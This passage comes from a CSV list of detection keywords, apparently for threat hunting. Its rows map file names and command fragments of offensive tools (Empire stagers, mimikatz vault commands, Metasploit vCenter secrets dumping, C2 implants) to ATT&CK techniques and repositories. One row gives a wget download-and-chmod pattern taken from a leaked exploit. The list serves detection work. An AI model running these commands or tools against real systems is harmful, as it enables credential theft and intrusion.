T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*users_dcsrp_full.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*users_kerberoasting.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*users_list_cme_ldap_nullsess_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*users_list_kerbrute_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*users_list_ridbrute_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z 
-*users_no_req_pass.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*users_no_req_pass_full.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*usestager *,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*usestager *backdoor*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework 
that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*usestager *ducky*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - 
T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*usestager *launcher_bat*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*usestager *launcher_lnk*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - 
T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*usestager *shellcode*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - 
TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*usestager multi/launcher*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*using donutCS*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*using NixImports*,offensive_tool_keyword,NixImports,A .NET malware loader using API-Hashing to 
evade static analysis,T1055.012 - T1562.001 - T1140,TA0005 - TA0003 - TA0040,N/A,N/A,Defense Evasion - Execution,https://github.com/dr4k0nia/NixImports,1,0,N/A,N/A,2,178,23,2023-05-30T14:14:21Z,2023-05-22T18:32:01Z -*using SharpExfiltrate*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,0,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*using SharpView.Enums*,offensive_tool_keyword,SharpView,C# implementation of harmj0y's PowerView,T1018 - T1482 - T1087.002 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,Discovery,https://github.com/tevora-threat/SharpView/,1,0,N/A,10,9,850,206,2021-12-17T15:53:20Z,2018-07-24T21:15:04Z -*using SMBeagle*,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,0,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -*Using VirusToal website as external C2*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*UsoDllLoader*,offensive_tool_keyword,UsoDllLoader,This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. 
It provides an alternative to the DiagHub DLL loading exploit ,T1210.001 - T1055 - T1574.001,TA0007 - TA0002 - TA0001,N/A,N/A,Exploitation tools,https://github.com/itm4n/UsoDllLoader,1,1,N/A,N/A,4,368,104,2020-06-06T11:05:12Z,2019-08-01T17:58:16Z -*usr/bin/wget -O /tmp/a http* chmod 755 /tmp/cron*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file echowrecker. samba 2.2 and 3.0.2a - 3.0.12-5 RCE (with DWARF symbols) for FreeBSD OpenBSD 3.1 OpenBSD 3.2 (with a non-executable stack zomg) and Linux. Likely CVE-2003-0201. There is also a Solaris version,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/x0rz/EQGRP/blob/master/Linux/bin/echowrecker,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*usr/share/seclists*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*usr/src/rusthound rusthound *,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,0,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z -*util.nimplant*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*util/dot_net_deserialization/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*utils/payloads.db*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*Utils\Posh.cs*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*uTorrent (1).exe*,greyware_tool_keyword,utorrent,popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network,T1193 - T1204 - T1486 - T1048,TA0005 - TA0011 - TA0010 - TA0040,N/A,N/A,Collection - Data Exfiltration,https[://]www[.]utorrent[.]com/intl/fr/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*uTorrent.exe*,greyware_tool_keyword,utorrent,popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. 
Not something we want to see installed in a enterprise network,T1193 - T1204 - T1486 - T1048,TA0005 - TA0011 - TA0010 - TA0040,N/A,N/A,Collection - Data Exfiltration,https[://]www[.]utorrent[.]com/intl/fr/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*utorrent_installer.exe*,greyware_tool_keyword,utorrent,popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network,T1193 - T1204 - T1486 - T1048,TA0005 - TA0011 - TA0010 - TA0040,N/A,N/A,Collection - Data Exfiltration,https[://]www[.]utorrent[.]com/intl/fr/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*utweb_installer.exe*,greyware_tool_keyword,utorrent,popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network,T1193 - T1204 - T1486 - T1048,TA0005 - TA0011 - TA0010 - TA0040,N/A,N/A,Collection - Data Exfiltration,https[://]www[.]utorrent[.]com/intl/fr/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*V3n0M-Scanner*,offensive_tool_keyword,V3n0M-Scanner,V3n0M is a free and open source scanner. Evolved from baltazars scanner. it has adapted several new features that improve fuctionality and usability. It is mostly experimental software. This program is for finding and executing various vulnerabilities. It scavenges the web using dorks and organizes the URLs it finds. 
Use at your own risk.,T1210.001 - T1190 - T1191 - T1595,TA0007 - TA0002 - TA0008 - TA0010,N/A,N/A,Web Attacks,https://github.com/v3n0m-Scanner/V3n0M-Scanner,1,1,N/A,N/A,10,1341,432,2023-10-03T06:04:39Z,2013-10-21T06:05:17Z -*v4d1/Dome*,offensive_tool_keyword,DOME,DOME - A subdomain enumeration tool,T1583 - T1595 - T1190,TA0011 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/v4d1/Dome,1,1,N/A,N/A,4,375,50,2022-03-10T12:08:17Z,2022-02-20T15:09:40Z -*valid_user@contoso.com:Password1*,offensive_tool_keyword,o365enum,Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.,T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002,TA0040 - TA0010 - TA0007,N/A,N/A,Exploitation tools,https://github.com/gremwell/o365enum,1,0,N/A,7,3,212,40,2021-04-23T14:40:52Z,2020-02-18T12:22:50Z -*vanhauser-thc/thc-hydra*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,1,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*vault::*,offensive_tool_keyword,mimikatz,mimikatz exploitation command,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*vault::cred*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*vault::list*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*vba-macro-mac-persistence.vbs*,offensive_tool_keyword,phishing-HTML-linter,Phishing and Social-Engineering related scripts,T1566.001 - T1056.001,TA0040 - TA0001,N/A,N/A,Phishing,https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing,1,1,N/A,10,10,2282,458,2023-06-27T19:16:49Z,2018-02-02T21:24:03Z -*VBA-RunPE -*,offensive_tool_keyword,VBA-RunPE,A simple yet effective implementation of the RunPE technique in VBA. This code can be used to run executables from the memory of Word or Excel. 
It is compatible with both 32 bits and 64 bits versions of Microsoft Office 2010 and above.,T1055 - T1218 - T1059,TA0002 - TA0008 - TA0011,N/A,N/A,Exploitation tools,https://github.com/itm4n/VBA-RunPE,1,0,N/A,N/A,8,777,189,2019-12-17T10:32:43Z,2018-01-28T19:50:44Z -*vba-windows-persistence.vbs*,offensive_tool_keyword,phishing-HTML-linter,Phishing and Social-Engineering related scripts,T1566.001 - T1056.001,TA0040 - TA0001,N/A,N/A,Phishing,https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing,1,1,N/A,10,10,2282,458,2023-06-27T19:16:49Z,2018-02-02T21:24:03Z -*vbs-obfuscator.py*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*VbulletinWidgetTemplateRce.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*vcenter_forge_saml_token*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*vcenter_secrets_dump.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*vcenter_secrets_dump.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*vcsmap*,offensive_tool_keyword,vcsmap,vcsmap is a plugin-based tool to scan public version control systems (currently GitHub and possibly Gitlab soon) for sensitive information like access tokens and credentials.,T1210.001 - T1190 - T1538,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/melvinsh/vcsmap,1,0,N/A,N/A,2,131,25,2021-08-31T20:47:07Z,2016-08-21T11:23:57Z -*vdi2john.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*vectra-ai-research/MAAD-AF*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 